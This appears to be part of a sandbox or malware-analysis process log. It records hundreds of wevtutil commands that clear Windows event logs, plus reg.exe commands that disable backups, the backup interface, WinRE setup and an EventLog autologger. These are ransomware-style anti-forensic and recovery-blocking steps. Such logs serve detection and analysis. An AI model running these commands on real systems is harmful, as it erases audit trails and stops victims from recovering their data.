wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
1⤵
PID:2668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
1⤵
PID:1332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
1⤵
PID:2576

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
1⤵
PID:3356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
1⤵
PID:740

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
1⤵
PID:3524

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
1⤵
PID:4668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
1⤵
- Clears Windows event logs
PID:1396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
1⤵
PID:4344

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
1⤵
- Clears Windows event logs
PID:5020

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"
1⤵
PID:3336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
1⤵
PID:4856

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
1⤵
- Clears Windows event logs
PID:4268

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
1⤵
PID:5004

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
1⤵
PID:544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
1⤵
PID:2744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Call"
1⤵
PID:920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"
1⤵
PID:1384

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
1⤵
PID:3996

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
1⤵
PID:2012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"
1⤵
PID:4128

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
1⤵
PID:1592

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
1⤵
PID:4064

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
1⤵
PID:3176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
1⤵
PID:2840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
1⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
1⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
1⤵
PID:2432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
1⤵
PID:3440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
1⤵
PID:4472

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
1⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
1⤵
PID:5076

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
1⤵
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
1⤵
PID:2380

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
1⤵
PID:2196

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
1⤵
PID:4876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
1⤵
PID:4880

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
1⤵
PID:3236

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
1⤵
PID:3244

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
1⤵
PID:2176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
1⤵
PID:4864

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
1⤵
PID:4564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
1⤵
PID:4504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
1⤵
PID:4124

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
1⤵
PID:1728

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
1⤵
PID:1864

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
1⤵
PID:3348

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:2228

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
1⤵
- Clears Windows event logs
PID:1792

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
1⤵
PID:372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
1⤵
PID:5032

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
1⤵
PID:3660

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:1864

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
1⤵
PID:1484

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
1⤵
PID:924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
1⤵
- Clears Windows event logs
PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
1⤵
PID:840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"
1⤵
- Clears Windows event logs
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
1⤵
PID:1928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
1⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"
1⤵
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
1⤵
PID:3376

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
1⤵
PID:3352

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
1⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
1⤵
PID:844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
1⤵
PID:1936

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
1⤵
PID:816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
1⤵
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
1⤵
PID:320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
1⤵
PID:2380

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
1⤵
PID:3772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
1⤵
PID:1320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
1⤵
PID:2196

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
1⤵
PID:4876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
1⤵
PID:4648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
1⤵
PID:4692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
1⤵
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
1⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
1⤵
PID:1556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
1⤵
PID:1504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
1⤵
PID:4568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
1⤵
PID:1088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
1⤵
PID:3108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
1⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"
1⤵
PID:4992

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"
1⤵
PID:1156

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"
1⤵
PID:2720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
1⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"
1⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
1⤵
PID:4396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
1⤵
PID:4432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
1⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"
1⤵
PID:2464

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"
1⤵
PID:2840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
1⤵
PID:1140

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"
1⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
1⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"
1⤵
PID:2056

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"
1⤵
PID:2556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
1⤵
PID:4268

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"
1⤵
PID:1900

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"
1⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
1⤵
PID:3372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"
1⤵
PID:2568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
1⤵
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
1⤵
PID:4692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"
1⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
1⤵
PID:1504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
1⤵
PID:1088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
1⤵
PID:3208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
1⤵
PID:4420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
1⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"
1⤵
PID:208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"
1⤵
PID:1356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"
1⤵
PID:4980

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"
1⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"
1⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"
1⤵
- Clears Windows event logs
PID:2840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"
1⤵
PID:2212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
1⤵
PID:3780

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"
1⤵
PID:5000

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
1⤵
PID:1928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
1⤵
PID:4928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"
1⤵
PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
1⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"
1⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
1⤵
- Clears Windows event logs
PID:4220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
1⤵
PID:3356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"
1⤵
PID:3456

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
1⤵
PID:3688

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
1⤵
PID:3216

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
1⤵
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
1⤵
PID:4268

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:4876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
1⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"
1⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
1⤵
PID:4272

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"
1⤵
PID:4568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
1⤵
PID:4088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"
1⤵
PID:2172

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:2012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"
1⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"
1⤵
PID:208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"
1⤵
PID:1616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"
1⤵
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"
1⤵
PID:4716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"
1⤵
PID:748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"
1⤵
PID:3972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"
1⤵
PID:1604

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"
1⤵
PID:3028

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
1⤵
PID:3280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"
1⤵
- Clears Windows event logs
PID:840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"
1⤵
PID:2720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"
1⤵
PID:1252

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"
1⤵
PID:4432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"
1⤵
PID:5068

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
1⤵
- Clears Windows event logs
PID:2212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
1⤵
PID:5000

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
1⤵
PID:2036

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
1⤵
PID:4988

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
1⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"
1⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"
1⤵
- Clears Windows event logs
PID:2904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
1⤵
PID:3828

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"
1⤵
PID:1444

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
1⤵
PID:1556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"
1⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"
1⤵
PID:220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"
1⤵
PID:1308

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
1⤵
PID:4648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
1⤵
PID:4124

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
1⤵
PID:2744

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
1⤵
PID:2568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
1⤵
PID:5116

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"
1⤵
- Clears Windows event logs
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
1⤵
PID:1900

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
1⤵
PID:3372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
1⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Log"
1⤵
PID:1872

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"
1⤵
PID:712

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"
1⤵
PID:2556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
1⤵
PID:2056

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
1⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
1⤵
PID:512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
1⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
1⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
1⤵
PID:4472

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"
1⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
1⤵
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"
1⤵
PID:2904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"
1⤵
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"
1⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"
1⤵
PID:4396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"
1⤵
PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
1⤵
PID:2720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"
1⤵
PID:4992

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"
1⤵
PID:436

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
1⤵
PID:1324

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
1⤵
PID:2280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
1⤵
PID:4568

